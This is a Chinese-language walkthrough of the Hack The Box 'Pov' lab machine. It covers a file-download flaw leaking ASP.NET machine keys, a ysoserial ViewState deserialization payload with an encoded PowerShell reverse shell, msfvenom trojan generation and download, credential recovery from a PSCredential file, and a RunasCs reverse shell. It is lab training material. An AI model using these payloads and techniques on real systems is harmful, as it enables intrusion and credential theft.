Hack The Box靶场 Sesson 4 WEEK 4 Pov靶机
靶机IP:10.10.11.251
信息收集
nmap扫一波
1 | ┌──(kali㉿kali)-[~] |
1 | ┌──(kali㉿kali)-[~] |
1 | ┌──(kali㉿kali)-[~] |
得到一个网站。
Web渗透
目录爆破
1 | ┌──(kali㉿kali)-[~] |
啥也没有。看到网页下面有个域名
子域名爆破
试试子域名爆破
1 | ┌──(kali㉿kali)-[~] |
得到域名dev.pov.htb
。添加host,看一下是啥东西
任意文件下载测试
发现可以下载文件
Burp抓包试一下
存在漏洞。下载web配置文件下来
得到XML
1 | <configuration> |
一个AES,没密钥搞不了;一个SHA1,没解出来。
ViewState反序列化漏洞
特征分析,发现可能存在ViewState反序列化漏洞。
漏洞原理请看这篇文章:https://www.cnblogs.com/zpchcbd/p/15112047.html
powershell反弹
由于对面是Windows主机,使用powershell反弹
在线shell生成工具:https://www.revshells.com/
这里注意,IP是VPN分给你的IP,网段问题要搞清楚。
ysoserial生成密文
下载ysoserial.exe
:https://github.com/pwntester/ysoserial.net/releases/tag/v1.36
1 | ./ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4ANAA1ACIALAA5ADAAMAAxACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==" --path="/portfolio/default.aspx" --apppath="/" --decryptionalg="AES" --decryptionkey="74477CEBDD09D66A4D4A8C8B5082A4CF9A15BE54A94F6F80D5E822F347183B43" --validationalg="SHA1" --validationkey="5620D3D029F914F4CDF25869D24EC2DA517435B200CCF1ACFA1EDE22213BECEB55BA3CF576813C3301FCB07018E605E7B7872EEACE791AAD71A267BC16633468" |
得到密文
1 | BETrzTL1SyqXcduHe0zo2ZqJ33AejOtAFFL%2F6xbIvOcyDK2c3O%2FmCDqD8mYoft72UTCQbJipWAok%2FPMMK6RAYeoK0ZuBJSib3d1BRo630LKmhJrRnsq0hQzT3kfrie2sfKuX5nm6y07wtnnT4b7XtI265kqVB2K8vqNUT9thj4NAnXbXtdj71qWg3wMe3IO0E6CIWWuxDDDQn4WU8S2fUguTl98VEZxEhBHtLRpAJyKLgCvQ%2B4W0HihSBb9p8g9wiVxTlofeuMgquUubk1k1ZKcHawA8RtlohTqXhK9FTUGZyVtKcnVN22TEiJihSnh8A9fc%2Fy8qYpLMEOUY8%2FSh%2BfQ39GLfCmC7x25JYHgLjfR3NrsFP70AaaXrlLLhLddO%2BET53dUyDBE%2FFQO0ZDXrPpw2AyGlsnBQ0cDuw%2Bv4pN3Zon8NWlrGwWcmSTIGbQFDU385sVR5n3Ck4IJUSEX3qGkU5LyiFmUx8%2FMDes3SKSzw3Q96sWZJvKw6Ex8jKErpHOn%2BiPgSMkP8b8HR9wQamC6lxKySvJdQHrS5EBpU3EhYzgOWwKcVIEEgB6dapkN%2Bxkfj3c09hO515LvX2sVIPn14B4D9tIb%2BnsYe3MBmvGdtryQRw247M8%2B4DGvFyvJtDnsp9%2Fvr73RhmTLslzrKou0snokFog42aGVsQsrjSTQW%2FQoik3BAJuy8Ew1naCRcrwXPgpeSWCYqhWFB86RRt8JAzos7iKOmFjA4SmdjVn5FMWN%2BkiFPQYZb8OvKxQEgHamjkH0gPz%2Fss%2BENaqIyEv3x%2B3KxCc5SrRKr5rltBBq7jFXfpAPh9it0aNgAQ172cBOJU%2Bb697whoTQdvjayM3dijpkxDitzoZsK212TT%2FYVDiquJAnf74U6QdovX3kkPk4W%2B8vZLvM3e9kIOOCtfG%2B%2BrCduU%2BoGKk5Af6UMtte%2BvQs2ypNMbLvz3pGqPgVXFGqR8uJNG6NARC2U99dKvGZ%2B0N%2BrdYhTniX9iFzGI0pfDCG9QHvP%2FZV3%2Frh%2Ff68cfFT9TCogpTShpZ2854yMi%2BKFlxvBi7pn4ABqhREc7Dg068ROI5bbmc%2FK4CqJfn2ODq31UuUHxP0NHX7Vj4QfoA2%2FN6djv0E1GfTo%2BprfGRSq7dblE78fN%2BGmGhSTRLdHX3gEVW56hDTSRjZlxDa81d%2BmWn6ohS1ZiHFtMDtFPlwr4v5vQXekVHGrTjwN54Oy5W5PRY8FzKLEMAxy1%2BN4I%2F%2FlotcJ2E0GnQADMrUGMHhbhYI5%2FWWP%2FyHezu6YiOtzLAR2T1DX3Ud8zBTUXYZ2S4H8jeaIpI2FD3QrZn8a48zrRGcUR4YzIH8NsHR11gjBLq8l7HSXkezoYAbSV7%2BYMXeT5FNkkjTjVowCMCGDOMRgks8nNgFuKGMQHP6TA%2BwaGNLTQXhHCWyONuIqnvVcVGb6SfQaAL5zWa6wvKNTYCCglt27%2FJJ6HcBaPfkkbGaZUzFJygckcNkNWK4NwQWY0tJ%2FKXGV5aPzG2%2Fq3QisEmugsfnid5io3onbeH6IsiuaP3KjXmz44twV6Xoxoh0nwCktaE1FmduwzPFIiOySmnDLw3YtEBhKYhWbLFdWZXnChuIHTZWDEsG7Uii4eR0b0uIZxTNxTP2BPegPxWGa%2FhXjjaypXRBt1iyfhdi1Z7ExtSehq6bGoV7gAGYm2keCT2%2BALJ22l3DKoUZzgQbi5kgDVHcxZgf3GyhYKTKVe%2FzsRRLfDQScxAJgg2nUru04IUc0Jho1ENRYapf8gMh2dKciO9mHFVsSM%2BL%2Bj%2Bcjycfplxk3hmfC%2Fx4B40vkhjx3nmhSHNLBeXehqgsHobtBSaH5MhLnjS3iluXUOFnUG6WTNkGiMF%2FeNEJIbKv49VxZp7VV0i7teMUQ30T1gqKhs7NFIw1vgFbVf2PnUs781YMPJmag5g6PLm4mMwoNjhrIFweSvOL1SEtQmqigzl%2B1RmY4WIi3hEg6uhBPDXX%2BUmfED1H2vuMS64ynLrznJxNRl6HtOXCNi6GcvYFv7aZKUoxk4tNustYHo52ufWX25KyNmqT8CnHXq1maeIWGcECIdPb4iN1dmXLR9Ynp0ikMUWJk%2FSXWc7TufdReqw0fj06iCt5IFNlnSC9CJifK3OAIgNqK2wfkZDRadBkIlf42AYMxfVaMspfSD5b8YbA9PX526U4kcYcPLj78CBIgA6wKrJIV4YMhVmp9TkvgDAXOzqKM9QIMVquyzxdqaUntYXAg%2Fgn8Lt1FN%2B06raMe09cZy076gyGpv2KxUG90f%2B9Zk7Su2uaf6G0ddC6vmex0z1%2Fo6vsU7VmEydIiZzxE1MjOIips8HHB3RpPNdGUzQNT%2F53JLzOBty9NSwZKmGRon%2FbB81tzBy%2FCopRoymOS7GysVa7tbtLP7knisbwrQ5NgGQwk7WAxLd1wGAjYqlrKduyysPnjv1Z5YtQcH%2BwRDdCubmyvvCsHmOANCdPltkjZy%2B9WKJF32DawRalgsCEa3GzW%2BuxCbsMXDQDKfLgPe6D7CCRcbY1hcrN6nLgLPNso3dd8Y%2F7zATC%2Fz96PcwjzXzlSggPH6eisN9TFNXyVzQdNg7cB50WV6N8bArIVxTGGgh1hO2RT6r1K0Ph3ExK%2BvLxwuhas%2F%2Bmvq%2FEXmVbiv4ngNIi65p7cJFtCW9hMIMcjGPUPodG5cqcKd0NMxa4qBQBg4Cm4BPLce2MQ0meOMATDs%2FzTK95QLc5LTq2St9cm55nafPlfnIh1ZnrVmElhxSFmfDEkLRZR9W0H1tCthbELNloxN%2Bbxr9qOAksRPGkNgfN2vOuOr4Zj3Pprc3GDx8MBhRUcZjm2wMWWb1oKe%2B4hyhQPTUHRyY4WutlTwtnUQiWDDgm3WKLobhS02vgwilX5my5w7zG%2B6TDIErWrlJBPgHLnCpn%2FnURTBIrv3VKLy2mIs9pptUWXnHs%2BYtDfQANxeLmhvljE4vK43Mt1UYWKU5%2Fv18IX%2F8EhQvjlk%2BfYKO1CGvfYZsxtt2hNlHcITpqYJrS26SNt9JaNcqFla7%2FrAAP7lTvO1g9oOk8BvFqAJxBHXU%2F3D8g03aVGgk1VZlcjajDyuA%3D%3D |
得到反弹
kali开启监听
1 | ┌──(root㉿Desktop-Trtyr)-[~] |
BP重发包,将__VIEWSTATE
改为我们的密文。
回到kali查看
得到shell
内网渗透
当前用户
看一下当前用户
1 | PS C:\windows\system32\inetsrv> whoami |
我们现在是用的sfitz用户,所以先来到该用户下,再进行操作
1 | cd C:/Users/sfitz |
上传MSF木马
因为VPN的原因,不能用CS木马,这里就用MSF了。
生成一个windows木马
1 | msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.45 LPORT=8888 -f exe -o /root/Tools/payload/hack.exe |
开启监控
1 | msfconsole |
搭建一个http服务
1 | python3 -m http.server 80 --bind 10.10.14.45 |
得到木马链接:http://10.10.14.45/hack.exe,然后让靶机接受木马
1 | Invoke-WebRequest -Uri "http://10.10.14.45:80/hack.exe" -OutFile ".\hack.exe" |
成功拿到shell
提权测试
初步提权测试
这里直接用进程迁移达到提权的目的
1 | ps |
拿到一堆进程,但是User我们只能看见当前用户的,这里有一个winlogon.exe
,这是NT用户登陆程序,我们迁移到这个进程内
1 | migrate 544 |
失败了,这个用户权限太低了。
MSF切换用户
翻一下User用户
有三个用户。看看文档
文档里有一个connection.xml
。里头有alaading
的账户密码
1 | <Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04"> |
使用命令
1 | $credential = Import-CliXml -Path C:\users\sfitz\documents\connection.xml |
得到密码f8gQ8fynP44ek1m3
1 | runas /user:alaading /password:f8gQ8fynP44ek1m3 cmd |
失败了。
RunasCs拿shell
搞一个RunasCs,让靶机下载
1 | Invoke-WebRequest -Uri "http://10.10.14.45:80/RunasCs.exe" -OutFile ".\RunasCs.exe" |
kali开一个4444端口,然后运行
1 | .\RunasCs.exe alaading f8gQ8fynP44ek1m3 cmd.exe -r 10.10.14.45:4444 |
上来了。找flag
得到flag
MSF提权
一样的套路,在上一遍MSF提权,不过这里用的是cmd,所以要用curl命令下载
1 | curl -v -o ".\hack.exe" "http://10.10.14.45:80/Tools/payload/hack.exe" |
成功!!!拿flag就行了